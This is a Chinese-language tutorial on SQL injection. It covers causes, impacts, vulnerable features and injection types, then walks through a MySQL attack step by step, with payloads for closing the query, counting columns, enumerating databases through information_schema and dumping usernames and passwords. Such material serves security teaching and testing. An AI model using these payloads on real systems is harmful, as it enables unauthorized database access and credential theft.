1、简介
SQL注入漏洞的原理是由于开发者在编写操作数据库 代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任 何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎 中执行。
2、漏洞危害
SQL注入是直接面对数据库进行攻击的, 其主要有以下几种危害:
- 权限较大情况下,可以通过SQL注入直接写入webshell或者直 接执行系统命令
- 权限较小情况下,可通过注入获得管理员权限、拖库等等
3、易出现问题的功能点
SQL注入经常出现在登陆页面、涉及获取HTTP头(user-agent/client-ip等)的功能点及订单处理等地方。例如登陆页面, 除常见的万能密码,post数据注入外也有可能发生在HTTP头中 的client-ip和x-forward-for等字段处。这些字段是用来记录登陆的 ip的,有可能会被存储进数据库中从而与数据库发生交互导致sql 注入。
4、分类
4.1 依据注入点类型分类
- 数字类型的注入
- 字符串类型的注入
- 搜索型注入
- insert注入
- update注入
- delete注入
4.2 依据提交方式分类
GET注入
POST注入
COOKIE注入
HTTP头注入
a) XFF注入
b) UA注入
c) REFERER注入
4.3 依据获取信息的方式分类
- 基于布尔的盲注
- 基于时间的盲注
- 基于报错的注入
- 联合查询注入
- 堆查询注入 (可同时执行多条语句 )
5、SQL注入的基本流程
当MySQL>= 5.0时,一般考虑的SQL基本注入流程如下:
1)在登陆页面、涉及获取HTTP头(user-agent/client-ip等)的功能点及订单处理的地方,尝试添加如下SQL语句造成闭合,观察页面及抓包结果,寻找注入点;
# 数字类型
or 1=1#
# 字符类型或模糊搜索类型
' or 1=1#
# 包含搜索类型
') or 1=1#
2)获取字段数。通过不断尝试改变x的值来观察页面反应确定字段数,当查询报错时,x-1为当前语句的查询字段数;
# 数字类型
order by x#
# 字符类型或模糊搜索类型
' order by x#
# 包含搜索类型
') order by x#
3)获取系统数据库名。 在MySQL >5.0中,数据库名存放在information_schema数据库下schemata表schema_name字段中 ;
# 根据之前获取到的字段数,将语句查询字段补充至与获取字段数一致
# 数字类型
union select 1,2,...,schema_name from information_schema.schemata#
# 字符类型或模糊搜索类型
' union select 1,2,...,schema_name from information_schema.schemata#
# 包含搜索类型
') union select 1,2,...,schema_name from information_schema.schemata#
4)获取当前数据库名;
# 参照之前的闭合构造方式,补充闭合字符串到下述语句
union select 1,2,...,database()
5)获取数据库中的表 ;
# 参照之前的闭合构造方式,补充闭合字符串到下述语句
union select 1,2,...,group_concat(table_name) from information_schema.tables where
table_schema=database()
6)获取表中的字段 ,这里假设要获取的目标表为user,实际情况可能要根据上一步获取的表名信息做多次尝试;
# 参照之前的闭合构造方式,补充闭合字符串到下述语句
union select 1,2,...,group_concat(column_name) from information_schema.columns where
table_schema=database() and table_name='users'
7)获取各个字段的值。 这里假设已经获取到表名为user,且字段为username和password。
# 参照之前的闭合构造方式,补充闭合字符串到下述语句
union select 1,2,...,group_concat(username,password) from users